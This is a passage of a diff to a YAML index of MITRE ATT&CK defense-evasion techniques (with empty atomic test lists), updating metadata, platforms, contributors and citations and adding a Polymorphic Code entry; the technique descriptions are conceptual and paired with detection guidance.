       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9583,11 +9668,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9713,7 +9798,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9735,7 +9820,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -9955,9 +10041,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10038,7 +10119,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10128,7 +10277,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10751,9 +10889,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -10990,48 +11124,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11040,9 +11150,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11107,7 +11245,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
